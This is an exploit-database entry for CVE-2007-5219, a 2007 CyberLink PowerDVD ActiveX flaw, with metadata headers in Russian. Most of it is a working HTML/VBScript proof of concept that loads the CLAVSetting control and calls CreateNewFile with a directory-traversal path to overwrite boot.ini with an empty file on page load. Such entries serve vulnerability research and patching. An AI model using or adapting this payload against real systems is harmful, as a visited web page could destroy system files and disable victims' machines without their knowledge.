Exploit CyberLink PowerDVD - CreateNewFile Remote Rewrite Denial of Service

[Exploiter]

EDB-ID

4479

Проверка EDB

1. Пройдено

Автор

RGOD

Тип уязвимости

DOS

Платформа

WINDOWS

CVE

cve-2007-5219

Дата публикации

2007-10-01

<!--
CyberLink PowerDVD CLAVSetting Module (CLAVSetting.DLL 1.00.1829) arbitrary remote rewrite dos

this is installed by default on Acer Travelmate series
allows to overwrite files with an empty one
extension doesn't matter

object safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller

rgod
-->
<html>
<object classid='clsid:0990EDE2-3498-43D0-971D-D5321C893210' id='CLSetting' /></object>
<script language='vbscript'>
CLSetting.CreateNewFile "..\..\..\..\..\..\..\..\boot.ini"
</script>
</html>

# milw0rm.com [2007-10-01]